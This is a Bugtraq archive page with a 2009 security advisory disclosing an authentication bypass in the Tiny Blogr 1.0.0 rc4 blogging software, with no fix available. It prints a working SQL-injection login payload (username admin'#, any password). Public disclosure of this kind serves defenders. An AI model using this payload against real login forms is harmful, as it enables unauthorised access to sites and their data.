Bugtraq mailing list archives
Tiny Blogr 1.0.0 rc4 Authentication Bypass
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx () gmail com>
Date: Fri, 17 Apr 2009 14:30:46 +0200
******* Salvatore "drosophila" Fresta ******* [+] Application: Tiny Blogr [+] Version: 1.0.0 rc4 [+] Website: http://tinyblogr.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx () gmail com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: class.eport.php This bug allows a guest to bypass the authentication system. ************************************************* [+] Code - [A] Authenticaion Bypass Username: admin'# Password: foo ************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351
Attachment:
Tiny Blogr 1.0.0 rc4 Authentication Bypass-17042009.txt
Description:
Current thread:
- Tiny Blogr 1.0.0 rc4 Authentication Bypass Salvatore "drosophila" Fresta (Apr 17)